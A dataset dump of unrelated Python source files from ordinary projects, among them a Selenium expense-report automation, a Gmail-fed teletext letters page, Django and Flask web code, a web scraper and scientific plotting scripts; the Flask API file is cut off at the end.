index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
5,600 | 14cb702054b8caaa8899a2a3d8b65aae9b063cb6 | import pandas
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
import json
CONFIG_FILE_NAME = os.path.join(os.path.dirname(__file__), 'input_info.json')
def create_new_report(chrome_driver_inner, report_info_inner):
add_new_report = chrome_driver_inner.find_element_by_id('MainContent_MainActionCreate')
add_new_report.click()
next_button = chrome_driver_inner.find_element_by_id('MainContent_AAWiz__Next')
next_button.click()
name_text = chrome_driver_inner.find_element_by_id('MainContent_ClientProjectName')
name_text.clear()
name_text.send_keys('{} - {} - {}'.format(report_info_inner['new_report_string'],
report_info_inner['start_date'],
report_info_inner['end_date']))
start_date_text = chrome_driver_inner.find_element_by_id('MainContent_StartDate_input')
start_date_text.clear()
start_date_text.send_keys(report_info_inner['start_date'])
end_date_text = chrome_driver_inner.find_element_by_id('MainContent_EndDate_input')
end_date_text.clear()
end_date_text.send_keys(report_info_inner['end_date'])
def execute_expense_report(report_filename=CONFIG_FILE_NAME,
report_info=None):
if report_filename and not report_info:
with open(report_filename, 'r') as input_file:
report_info = json.load(input_file)
report_info['password'] = ''
report_info['user_name'] = ''
file_name = report_info['reconciliation_report_location']
excel_file = pandas.ExcelFile(file_name)
pcard_df = excel_file.parse(excel_file.sheet_names, skiprows=8)
recon_df = pcard_df['PCard Reconciliation Report']
names = recon_df['Employee Name'].dropna().unique()
chrome_driver = webdriver.Chrome(os.path.join(os.path.dirname(__file__), 'chromedriver.exe'))
did_not_finish_list= []
finished_users =[]
logon_website = report_info['logon_website']
chrome_driver.get(logon_website)
chrome_driver.find_element_by_id('userNameInput').send_keys(report_info['email_address'])
chrome_driver.find_element_by_id('passwordInput').send_keys(report_info['password'])
chrome_driver.find_element_by_id('passwordInput').send_keys(Keys.ENTER)
chosen_names = names
for current_id, the_name in enumerate(chosen_names):
chrome_driver.implicitly_wait(0)
print('Processing user {} of {}, {}'.format(current_id+1, len(chosen_names), the_name))
current_user_dropdown = Select(chrome_driver.find_element_by_id('CurrentUserDropdown'))
current_user_dropdown.select_by_visible_text(report_info['user_name'])
configuration_link = chrome_driver.find_element_by_id('topNavToolsConfigurationLink')
configuration_link.click()
view_and_edit_users = chrome_driver.find_element_by_id('MainContent_ctl69')
view_and_edit_users.click()
last_name = chrome_driver.find_element_by_id('MainContent_LName')
last_name_str = the_name.split()[1]
last_name.send_keys(last_name_str)
last_name.send_keys(Keys.ENTER)
user_tag = chrome_driver.find_element_by_xpath("//nobr[text() = \"{}\"]".format(the_name))
edit_user = user_tag.find_elements_by_xpath("../..//img[@src='images/16_edit.png']")
edit_user[0].click()
switch_user = chrome_driver.find_element_by_link_text('Switch to this User')
switch_user.click()
more_items = chrome_driver.find_element_by_id('MainContent_lblWalletMoreItems')
more_items.click()
transaction_list = chrome_driver.find_elements_by_xpath("//*[@class='feed_row-primary']//img[@src='images/16_credit-card.png']")
for i_val in transaction_list:
i_val.find_element_by_xpath("../..//input[@type='checkbox']").click()
try:
add_content = chrome_driver.find_element_by_id('MainContent_Add')
add_content.click()
except:
did_not_finish_list.append(the_name)
continue
#time.sleep(3)
chrome_driver.implicitly_wait(int(report_info['wait_time']))
try:
add_to_existing = chrome_driver.find_element_by_id('MainContent_MainActionAdd')
add_to_existing.click()
except NoSuchElementException:
did_not_finish_list.append(the_name)
continue
chrome_driver.implicitly_wait(0)
if add_to_existing.get_attribute('disabled') == 'true':
create_new_report(chrome_driver, report_info)
else:
next_button = chrome_driver.find_element_by_id('MainContent_AAWiz__Next')
next_button.click()
selected_report = Select(chrome_driver.find_element_by_id('MainContent_SelectedExpenseReport'))
try:
selected_report.select_by_visible_text('{} - {} - {}'.format(report_info['report_executive_string'],
report_info['start_date'],
report_info['end_date']))
except NoSuchElementException:
back_button = chrome_driver.find_element_by_id('MainContent_AAWiz__Back')
back_button.click()
create_new_report(chrome_driver, report_info)
next_button_2= chrome_driver.find_element_by_id('MainContent_AAWiz__Next')
next_button_2.click()
finished_users.append(the_name)
current_user_dropdown = Select(chrome_driver.find_element_by_id('CurrentUserDropdown'))
current_user_dropdown.select_by_visible_text(report_info['user_name'])
print('Did not finish: {}'.format(did_not_finish_list))
if __name__ == '__main__':
execute_expense_report() |
5,601 | e714fe0e27ec9ea5acb3120a4d2114d3d7674fcf | import os
import json
from page import Page
from random import choice
from os.path import join, expanduser
from file_handler import f_read, f_readlines, open_local
import config
class LetterPage(Page):
def __init__(self, page_num,n):
super(LetterPage, self).__init__(page_num)
self.title = "Letters"
self.in_index = False
self.n = n
self.tagline = "Email klbscroggsbot@gmail.com and your letter will appear here"
self.letters = ""
def background(self):
self.letters = f_read("emails")
if config.NAME == "KLBFAX" and self.n==1 and config.has_gmail_login():
import gmail
details = f_readlines("gmail")
g = gmail.login(details[0],details[1])
unread = g.inbox().mail(unread=True)
for mail in unread:
mail.fetch()
lines = "".join(mail.body.split("\r")).split("\n")
if lines[0] == "EVENT" and "matthew.scroggs.14@ucl.ac.uk" in mail.fr:
try:
with open_local('events','a') as f:
for line in lines:
if line!="EVENT":
f.write(line+"\n")
mail.read()
except:
pass
elif lines[0] == "CARD" and "matthew.scroggs.14@ucl.ac.uk" in mail.fr:
with open('/home/pi/cards/'+lines[1],"w") as f:
f.write("\n".join(lines[2:]))
mail.read()
elif "POINTS" in lines[0].upper() and "belgin.seymenoglu.10@ucl.ac.uk" in mail.fr:
from points import add_points
length = 1
points_to_give = 0
while length<=len(lines[2]):
try:
if lines[2][:length]!="-":
points_to_give = int(lines[2][:length])
length += 1
except:
break
add_points(lines[1].split("=")[0],points_to_give)
mail.read()
else:
newletter = ""
for line in lines:
if line!="":
while len(line)>79:
newletter += line[:79]+"\n"
line=line[79:]
newletter+=line+"\n"
self.letters=newletter+"\n"+"from "+mail.fr+"\n\n"+self.letters
mail.read()
self.letters = self.letters.split("\n")
if len(self.letters)>1000:
self.letters = self.letters[:1000]
with open_local("emails","w") as f:
f.write("\n".join(self.letters))
else:
self.letters = self.letters.split("\n")
def generate_content(self):
letters = self.letters[20*(self.n-1):20*self.n]
letters = "\n".join(letters)
try:
letters = unicode(letters,'latin1')
except:
letters = str(letters)
self.add_title("Have your say",font="size4")
a = str(self.n)+"/21"
self.move_cursor(x=90-len(a))
self.add_text(a, fg="BLUE", bg="YELLOW")
self.move_cursor(x=0)
self.start_random_bg_color()
for line in letters.split("\n"):
line = line.rstrip("\n")
if line == "":
self.end_bg_color()
self.start_random_bg_color()
self.add_text(line,fg="BLACK")
self.add_newline()
self.end_bg_color()
if self.n==21:
self.add_text("~ END OF LETTERS ~")
else:
self.add_text("The letters continue on page "+str(200+self.n))
letters_page1 = LetterPage("200",1)
letters_page1.in_index = True
letters_page1.index_num = "200-220"
letters_page2 = LetterPage("201",2)
letters_page3 = LetterPage("202",3)
letters_page4 = LetterPage("203",4)
letters_page5 = LetterPage("204",5)
letters_page6 = LetterPage("205",6)
letters_page7 = LetterPage("206",7)
letters_page8 = LetterPage("207",8)
letters_page9 = LetterPage("208",9)
letters_page10 = LetterPage("209",10)
letters_page11 = LetterPage("210",11)
letters_page12 = LetterPage("211",12)
letters_page13 = LetterPage("212",13)
letters_page14 = LetterPage("213",14)
letters_page15 = LetterPage("214",15)
letters_page16 = LetterPage("215",16)
letters_page17 = LetterPage("216",17)
letters_page18 = LetterPage("217",18)
letters_page19 = LetterPage("218",19)
letters_page20 = LetterPage("219",20)
letters_page21 = LetterPage("220",21)
|
5,602 | 3b737aaa820da8f70a80480c6404e4d3a9d2262e | """
COMPARISON OPERATORS
"""
__author__ = 'Sol Amour - amoursol@gmail.com'
__twitter__ = '@solamour'
__version__ = '1.0.0'
greaterThan = 10 > 5 # Is '10' greater than '5' ? Evaluates to True
greaterThanOrEqualTo = 10 >= 10 # Is '10' greater than or equal to '10'
# ? Evaluates to True
lessThan = 5 < 10 # Is '5' less than '10' ? Evaluates to True
lessThanOrEqualTo = 5 <= 5 # Is '5' less than or equal to '5' ? Evaluates
# to True
equals = 5 == 5 # Does '5' equal '5' ? Evaluates to True
notEquals = 5 != 10 # Does '5' not equal '10' ? Evaluates to True
x = 2 # Assinging the variable of 'x' a value of '2'
y = 1 < x < 3 # Is '1' less than 'x' (2) is less than 3 ? Evaluates to True
OUT = [greaterThan, greaterThanOrEqualTo, lessThan, lessThanOrEqualTo,
equals, notEquals, y]
|
5,603 | e279ca43ce2c582c702f1c6a0c1acf37eb9bcefe | from django.shortcuts import render
def index(request):
return render(request, 'munchiesfastfood/home.html', {'drinks':['Pineapple Juice','Green Juice','Soft Drinks','Carlo Rosee Drinks'], 'dishes':['Beef Steak','Tomato with Chicken','Sausages from Italy','Beef Grilled']})
|
5,604 | 0ef172ced411213c0f7daccd632f8d5ec97379c3 | from django.apps import AppConfig
class EasyTechConfig(AppConfig):
name = 'easy_tech'
|
5,605 | f01a1b6d0de4ba685c489af2742159447f943d2d | # -*- coding: utf-8 -*-
"""
Created on Thu May 24 18:18:36 2018
@author: Nicole
"""
from __future__ import division
import Rod
import matplotlib.pyplot as plt
import math
class Truss:
def __init__(self,node1,node2,size,result,ax):
self.node1=node1
self.node2=node2
self.rod=Rod.Rod(node1,node2,result)
self.size=size
self.result=result
self.ax=ax
self.length=math.sqrt((node1.x-node2.x)**2+(node1.y-node2.y)**2)
def PlotCalculatedTruss(self):
self.node1.PlotNode()
self.node1.PlotSupport()
self.node1.PlotForce()
self.node2.PlotNode()
self.node2.PlotSupport()
self.node2.PlotForce()
self.rod.PlotRod()
self.rod.PlotResult()
def PlotUncalculatedTruss(self):
self.node1.PlotNode()
self.node1.PlotSupport()
self.node1.PlotForce()
self.node2.PlotNode()
self.node2.PlotSupport()
self.node2.PlotForce()
self.rod.PlotRod()
def SaveTrussFig(self):
plt.savefig('truss.png',dpi=600)
plt.show()
'''
pud=UnitPostProcess(1.8,1.4,3.4,3.2,1,1,1,0,5,0,0,8,8.0,48.6667)
pud.setfig()
pud.plot()
pud=UnitPostProcess(3.4,3.2,7.4,3.2,0,0,1,1,0,0,0,0,8.0,23.3333)
pud.plot()
pud.savefig()
''' |
5,606 | 26b0a762b8eb30f0ef3c5a914f032c2a7d24f750 | # 12.02.17
"""
nomencalura
a__b__c
a: parametro
t-temperatura
tm-temperatura minima
tM-teperatura massima
b: intervallo di tempo
a-anno
c: tabella fonte dati
g-giornaliero
"""
import db_02 as DB
def t_tm_tM__a__g(db, anno):
cmd = """
SELECT data, t, tmin, tmax
FROM Giornaliero
WHERE strftime('%Y') = '{}'
""".format(anno)
dati = db.cur.execute(cmd).fetchall()
ldate = []
lt = []
ltm = []
ltM = []
for data, t, tm , tM in dati:
ldate.append(data)
lt.append(t)
ltm.append(tm)
ltM.append(tM)
return ldate, lt, ltm, ltM
if __name__ == '__main__':
db = DB.DB()
db.crea_db()
t_tm_tM__a__g(db, 2017)
|
5,607 | e5c30488c8c1682171c57a11a8ecedc5ccd4d851 | import numpy as np
import matplotlib.pyplot as plt
import sys
import os
from azavg_util import plot_azav
from binormalized_cbar import MidpointNormalize
from diagnostic_reading import ReferenceState
dirname = sys.argv[1]
datadir = dirname + '/data/'
plotdir = dirname + '/plots/'
if (not os.path.isdir(plotdir)):
os.makedirs(plotdir)
ref = ReferenceState(dirname + '/reference', '')
H_rho = -1./ref.dlnrho
# Get grid info
rr,tt,cost,sint,rr_depth,ri,ro,d = np.load(datadir + 'grid_info.npy')
nr, nt = len(rr), len(tt)
H_rho_2d = H_rho.reshape((1, nr))
vr2_p,vt2_p,vp2_p,vrvp_p,vrvt_p,vtvp_p,\
vr2_m,vt2_m,vp2_m, vrvp_m, vrvt_m, vtvp_m, fplus, fminus\
= np.load(datadir + 'rs_raw.npy')
vrvp_t = vrvp_m + vrvp_p
vrvt_t = vrvt_m + vrvt_p
vtvp_t = vtvp_m + vtvp_p
vr2_t = vr2_m + vr2_p
vt2_t = vt2_m + vt2_p
vp2_t = vp2_m + vp2_p
# Total velocity
v2_p = vr2_p + vt2_p + vp2_p
v2_m = vr2_m + vt2_p + vp2_m
v2_t = vr2_t + vt2_p + vp2_t
Om = 7.8e-6
ro_p = np.sqrt(v2_p)/(2*Om*H_rho_2d)
ro_m = np.sqrt(v2_m)/(2*Om*H_rho_2d)
ro_t = np.sqrt(v2_t)/(2*Om*H_rho_2d)
# Plot radial angular momentum transport
fig, ax = plt.subplots()
plot_azav(fig, ax, ro_m, rr, cost, sint,
contours=False, notfloat=False, units='')
plt.title(r'$({\rm{Ro}}_{\rm{c}})_+$',fontsize=16)
plt.tight_layout()
plt.show()
plt.savefig(plotdir + 'rossby_mer_p.png')
plt.close()
|
5,608 | 9a0e37aaa41f3b21ed7ad11096cd6c5dd0bb8564 | import time
t0 = time.time()
while abs(t0-time.time()<60):
pass
|
5,609 | 175e8ecdd0c9faa5fc981447f821763e0eb58b4d | import h5py
import numpy as np
from matplotlib import pyplot
from IPython.Shell import IPShellEmbed
ipshell = IPShellEmbed("Dropping to IPython shell")
filename = "SPY-VXX-20090507-20100427.hdf5"
start_day = 1
end_day = 245
#start_day = 108
#end_day = 111
start_day = 120
end_day = 245
start_day = 1
end_day = 120
start_day = 120
end_day = 180
start_day = 0
end_day = 245
days = end_day - start_day
|
5,610 | a1db566f4da16e7725212aeab29e946ef7c1672e | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('home_application', '0019_auto_20170809_1810'),
]
operations = [
migrations.CreateModel(
name='QcloudImageInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
('osname', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
('image_size', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u5bb9\u91cf\uff08GiB\uff09')),
('image_type', models.IntegerField(verbose_name='\u955c\u50cf\u7c7b\u578b')),
('created_time', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u65f6\u95f4')),
('image_state', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u72b6\u6001')),
('image_source', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u6765\u6e90')),
('image_name', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u540d\u79f0')),
('image_description', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u8be6\u7ec6\u63cf\u8ff0')),
('image_creator', models.CharField(max_length=50, verbose_name='\u955c\u50cf\u521b\u5efa\u8005')),
('operation_mask', models.CharField(max_length=50, verbose_name='')),
],
options={
'db_table': 'qcloud_image_info',
},
),
migrations.CreateModel(
name='QcloudInstanceInfo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('instance_id', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8bid')),
('instance_name', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u540d\u79f0')),
('instance_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7c7b\u578b')),
('cpu', models.CharField(max_length=50, verbose_name='cpu')),
('memory', models.CharField(max_length=50, verbose_name='\u5185\u5b58')),
('status', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u72b6\u6001')),
('zone', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u6240\u5c5e\u5730\u57df')),
('instance_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u8ba1\u8d39\u6a21\u5f0f')),
('private_ip_addresses', models.CharField(max_length=50, verbose_name='\u5185\u7f51ip')),
('public_ip_addresses', models.CharField(max_length=50, verbose_name='\u5916\u7f51ip')),
('image_id', models.CharField(max_length=50, verbose_name='\u955c\u50cfid')),
('os_name', models.CharField(max_length=50, verbose_name='\u64cd\u4f5c\u7cfb\u7edf\u540d\u79f0')),
('system_disk_type', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u7c7b\u578b')),
('system_disk_size', models.CharField(max_length=50, verbose_name='\u7cfb\u7edf\u76d8\u5c3a\u5bf8')),
('renew_flag', models.CharField(max_length=50, verbose_name='\u81ea\u52a8\u7eed\u8d39\u6807\u8bc6')),
('internet_max_bandwidth_out', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u5e26\u5bbd\u4e0a\u9650')),
('internet_charge_type', models.CharField(max_length=50, verbose_name='\u5b9e\u4f8b\u7f51\u7edc\u8ba1\u8d39\u7c7b\u578b')),
('created_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u521b\u5efa\u65f6\u95f4')),
('expired_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='\u5b9e\u4f8b\u5230\u671f\u65f6\u95f4')),
],
options={
'db_table': 'qcloud_instance_info',
},
),
]
|
5,611 | 9d302ff2de8280bd8786794cdd533107d2a458bc | import urllib3
import json
def download(url):
print('Downloading ', url)
userAgent = 'Mozilla/5.0 (Linux; U; Android 10; zh-cn; MI 9 Build/QKQ1.190825.002) AppleWebKit/533.1 (KHTML, like Gecko) Version/5.0 Mobile Safari/533.1'
userAgent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Mobile Safari/537.36'
AcceptLanguage ='zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7'
AcceptEncoding= 'gzip, deflate'
Accept = 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
Cookie = 'JSESSIONID=A58B0B1DC96828832B92EE91D9E92605.7; tuNQaYE2WCOr80S=O43ziCfC7BLZm.F5edsUL84qX_T8DekwZhjFvL0AXMCYWDFH2_2qqyIQwdLwjfJb; tuNQaYE2WCOr80T=4zC94ZgkJ7NBDRsPXe.HrtFd3tXcvwudE41SSD4iUqL2TMsVQSF_QZ8LinHlNDmqOg_SeNEwr7NLRVyTJ7tG81Q310tSQQPTX0GJJDgefw7pPhWCn2BTVLKZ.MM_8iydxo1hNiKsmf7t9C5h3dn5b0DwZgfFZIzR1Ji4dsQdfhFkYTG5rdPQUPR5Y9.SG8jXjtXLxhv98Jx9DkyPYf2HWMJSWhjZlSe1sjjzACwcCozHaqBCvc_6F9mVCbKTdW44GKor91iD_VU2yaig6LwIHC5lVS0hSMTZQVlYPRJiQPf9AdA'
http = urllib3.PoolManager(num_pools=5, headers={'User-Agent': userAgent,'Accept - Language': AcceptLanguage,
'Accept-Encoding': AcceptEncoding ,'Accept':Accept,
'Proxy-Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Cookie':Cookie})
r = http.request('GET', url)
print(r.status)
html = r.data.decode()
return html
if __name__ == '__main__':
demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex=1&pageSize=1500'
demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK=109228'
demoDetailUrl = 'http://mobile.nmpa.gov.cn/datasearch/QueryRecord?tableId=25&searchF=ID&searchK='
for i in range(1,10):
demoURL = 'http://mobile.nmpa.gov.cn/datasearch/QueryList?tableId=25&searchF=Quick%20SearchK&pageIndex='+str(i)+'&pageSize=1500'
ss = download(demoURL)
print(ss)
data = json.loads(ss)
for item in data:
# searchK = item['COUNT']
searchK = item['ID']
print(item['CONTENT'])
detailInfoJson = download(demoDetailUrl + str(searchK))
detailInfo = json.loads(detailInfoJson)
detailJson = '{'
for detail in detailInfo:
if detail['NAME'] != '注':
detailJson = detailJson + '"' + detail['NAME'] + '":"' + detail['CONTENT'] + '",'
detailJson = detailJson[:-1]
detailJson = detailJson + '}'
print(detailJson)
detailData = json.loads(detailJson)
# print(item['CONTENT'])
|
5,612 | e89600f109335ffdb00c13f617d61496c547ba61 | import requests, os
def lambda_handler(event, context):
print(requests)
apiKey = os.environ['newrelic_api_key']
headers = {'content-type': 'application/json', 'Accept-Charset': 'UTF-8', 'X-api-key' : apiKey}
r = requests.get('https://api.newrelic.com/v2/applications.json', headers=headers)
return r.json()
|
5,613 | ede675c971ed233e93c14aa4d2ffb66fe7ba775a | """
This is the hourly animation program. It displays a series of images across the board.
It is hard coded to work with the Sonic images. Adjustments would need to be made to
the y values which are distance traveled. Change sonicFrame < 8 value to the total
number of frames the new animation has.
"""
from runImages import *
def animationDisplay():
matrix.Clear()
sonicRun = 0
sonicFrame = 0
y = 0
while y < 70:
sonicFrame = 0
if sonicRun >= 100:
sonicRun = 0
y = y + 15
while sonicFrame < 8:
animationFrame = 'animation/SonicRun-' + str(sonicFrame) + '.jpg'
imageDisplay(animationFrame, sonicRun, y)
time.sleep(0.05)
sonicRun = sonicRun + 6
sonicFrame = sonicFrame + 1
|
5,614 | 20a238826640099e6c69aaa383c5fa7e9b02b13b | """
Contains derivative computation for BSSN formulation of ET equations.
"""
# first derivative
import cog
D = ["alpha", "beta0", "beta1", "beta2",
"B0", "B1", "B2",
"chi", "Gt0", "Gt1", "Gt2", "K",
"gt0", "gt1", "gt2", "gt3", "gt4", "gt5",
"At0", "At1", "At2", "At3", "At4", "At5" ]
# custom functions for code generation in cse.
custom_functions = {'grad': 'grad', 'grad2': 'grad2', 'agrad': 'agrad', 'kograd': 'kograd'}
# second derivs required for RHS
DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi",
"alpha", "beta0", "beta1", "beta2" ]
# advective derivatives
AD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5",
"At0", "At1", "At2", "At3", "At4", "At5",
"alpha", "beta0", "beta1", "beta2", "chi", "Gt0", "Gt1", "Gt2", "K",
"B0", "B1", "B2"]
KO=AD
# first derivs required for constraints--no gauge variables
CONSTRAINT_D = [ "chi", "Gt0", "Gt1", "Gt2", "K",
"gt0", "gt1", "gt2", "gt3", "gt4", "gt5",
"At0", "At1", "At2", "At3", "At4", "At5" ]
# second derivs required for constraints--no gauge variables
CONSTRAINT_DD = ["gt0", "gt1", "gt2", "gt3", "gt4", "gt5", "chi"]
PREFIX_D = ["grad_0_", "grad_1_", "grad_2_"]
PREFIX_AD = ["agrad_0_", "agrad_1_", "agrad_2_"]
PREFIX_KOD = ["kograd_0_", "kograd_1_", "kograd_2_"]
PREFIX_DD = ["grad2_0_0_", "grad2_0_1_", "grad2_0_2_", "grad2_1_1_", "grad2_1_2_", "grad2_2_2_"]
# first derivative in i direction
FUNC_D_I=[]
for f in D:
for p in PREFIX_D:
FUNC_D_I.append(p+f)
# second derivative in ij direction
FUNC_D_IJ=[]
for f in DD:
for p in PREFIX_DD:
FUNC_D_IJ.append(p+f)
#advective derivative in i direction
FUNC_AD_I=[]
for f in AD:
for p in PREFIX_AD:
FUNC_AD_I.append(p+f)
#Kriess-Oliger derivative in i direction
FUNC_KOD_I=[]
for f in D:
for p in PREFIX_KOD:
FUNC_KOD_I.append(p+f)
FUNC_CONS=[]
for f in CONSTRAINT_D:
for p in PREFIX_D:
FUNC_CONS.append(p+f)
for f in CONSTRAINT_DD:
for p in PREFIX_DD:
FUNC_CONS.append(p+f)
def allocDerivMemory():
for deriv in FUNC_D_I:
cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);")
for deriv in FUNC_D_IJ:
cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);")
for deriv in FUNC_AD_I:
cog.outl("\t double* "+deriv+" = (double*)malloc(sizeof(double)*n);")
def computeRHSDerivs():
for var in D:
cog.outl("\t deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_D[0] + var ,var))
cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_D[1] + var ,var))
cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_D[2] + var ,var))
if var in DD:
cog.outl("\t deriv_xx(%s, %s, hx, sz, bflag);" %(PREFIX_DD[0] + var ,var))
cog.outl("\t deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_DD[1] + var , PREFIX_D[0] + var ))
cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[2] + var , PREFIX_D[0] + var ))
cog.outl("\t deriv_yy(%s, %s, hx, sz, bflag);" %(PREFIX_DD[3] + var ,var))
cog.outl("\t deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_DD[4] + var , PREFIX_D[1] + var))
cog.outl("\t deriv_zz(%s, %s, hx, sz, bflag);" %(PREFIX_DD[5] + var ,var))
if var in AD:
cog.outl("\t adv_deriv_x(%s, %s, hx, sz, bflag);" %(PREFIX_AD[0] + var ,var))
cog.outl("\t adv_deriv_y(%s, %s, hx, sz, bflag);" %(PREFIX_AD[1] + var ,var))
cog.outl("\t adv_deriv_z(%s, %s, hx, sz, bflag);" %(PREFIX_AD[2] + var ,var))
def deallocDerivMemory():
for deriv in FUNC_D_I:
cog.outl("\t free(%s);" %(deriv))
for deriv in FUNC_D_IJ:
cog.outl("\t free(%s);" %(deriv))
for deriv in FUNC_AD_I:
cog.outl("\t free(%s);" %(deriv))
|
5,615 | 3b19ee0bbd24b76dd8b933859f6a56c459926861 | from javascript import JSConstructor
from javascript import JSObject
cango = JSConstructor(Cango2D)
shapes2d = JSObject(shapes2D)
tweener = JSConstructor(Tweener)
drag2d = JSConstructor(Drag2D)
svgtocgo2d = JSConstructor(svgToCgo2D)
cgo = cango("plotarea")
x1, y1 = 40, 20
cx1, cy1 = 90, 120
x2, y2 = 120, 100
cx2, cy2 = 130, 20
cx3, cy3 = 150, 120
x3, y3 = 180, 60
#called in scope of dragNdrop obj
def dragC1(mousePos):
global cx1, cy1
cx1 = mousePos.x
cy1 = mousePos.y
drawCurve()
def dragC2(mousePos):
global cx2, cy2
cx2 = mousePos.x
cy2 = mousePos.y
drawCurve()
def dragC3(mousePos):
global cx3, cy3
cx3 = mousePos.x
cy3 = mousePos.y
drawCurve()
def drawCurve():
# curve change shape so it must be re-compiled each time
# draw a quadratic bezier from x1,y2 to x2,y2
qbezdata = ['M', x1, y1, 'Q', cx1, cy1, x2, y2]
qbez = cgo.compilePath(qbezdata, 'blue')
cbezdata = ['M', x2, y2, 'C', cx2, cy2, cx3, cy3, x3, y3]
cbez = cgo.compilePath(cbezdata, 'green')
# show lines to control point
data = ['M', x1, y1, 'L', cx1, cy1, x2, y2]
# semi-transparent gray
L1 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
data = ['M', x2, y2, 'L', cx2, cy2]
L2 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
data = ['M', x3, y3, 'L', cx3, cy3]
L3 = cgo.compilePath(data, "rgba(0, 0, 0, 0.2)")
# draw draggable control points
c1.transform.reset()
c1.transform.translate(cx1, cy1)
c2.transform.reset()
c2.transform.translate(cx2, cy2)
c3.transform.reset()
c3.transform.translate(cx3, cy3)
grp = cgo.createGroup2D(qbez, cbez, L1, L2, L3, c1, c2, c3)
cgo.renderFrame(grp)
cgo.clearCanvas("lightyellow")
cgo.setWorldCoords(0, 0, 200)
# pre-compile the draggable control point
dragObj1 = drag2d(cgo, null, dragC1, null)
c1 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c1.enableDrag(dragObj1)
dragObj2 = drag2d(cgo, null, dragC2, null)
c2 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c2.enableDrag(dragObj2)
dragObj3 = drag2d(cgo, null, dragC3, null)
c3 = cgo.compileShape(shapes2d.circle, 'red', 'red', 4)
c3.enableDrag(dragObj3)
drawCurve() |
5,616 | d03a8076b77851ae4df5cf657ff898eb132c49c3 | # Lahman.py
# Convert to/from web native JSON and Python/RDB types.
import json
# Include Flask packages
from flask import Flask
from flask import request
import copy
import SimpleBO
# The main program that executes. This call creates an instance of a
# class and the constructor starts the runtime.
app = Flask(__name__)
def parse_and_print_args():
fields = None
in_args = None
if request.args is not None:
in_args = dict(copy.copy(request.args))
fields = copy.copy(in_args.get('fields',None))
if fields:
del(in_args['fields'])
offset = copy.copy(in_args.get('offset',None))
if offset:
del(in_args['offset'])
limit = copy.copy(in_args.get('limit',None))
if limit:
del(in_args['limit'])
try:
if request.data:
body = json.loads(request.data)
else:
body = None
except Exception as e:
print("exception here is: ", e)
body = None
print("Request.args : ", json.dumps(in_args))
return in_args,fields,body,limit,offset
@app.route('/api/<resource>',methods = ['GET','POST'])
def Basic_resource(resource):
in_args,fields,body,offset,limit = parse_and_print_args()
if request.method == 'GET':
result = SimpleBO.find_by_template(resource,in_args,fields,limit,offset)
url = request.url
url_root = request.url_root
links = SimpleBO.generate_links(url,url_root,resource,in_args,fields,offset,limit,result)
output=[{"data":result,
"links":links}]
return json.dumps(output), 200, \
{"content-type": "application/json; charset:utf-8"}
elif request.method == 'POST':
result = SimpleBO.Insert(resource,body)
return result
else:
return "Method " + request.method + " on resource " + resource + \
" not implemented!", 501, {"content-type": "text/plain; charset: utf-8"}
@app.route('/api/<resource>/<primary_key>',methods = ['GET','PUT','DELETE'])
def Specific_resource(resource,primary_key):
in_args,fields,body,offset,limit = parse_and_print_args()
if request.method == 'GET':
result = SimpleBO.find_by_primary_key(resource,primary_key,fields)
return json.dumps(result), 200, \
{"content-type": "application/json; charset:utf-8"}
elif request.method == 'PUT':
result = SimpleBO.Update(resource,body,primary_key)
return json.dumps(result), 200, \
{"content-type": "application/json; charset:utf-8"}
elif request.method == 'DELETE':
result = SimpleBO.Delete(resource,primary_key)
return result
else:
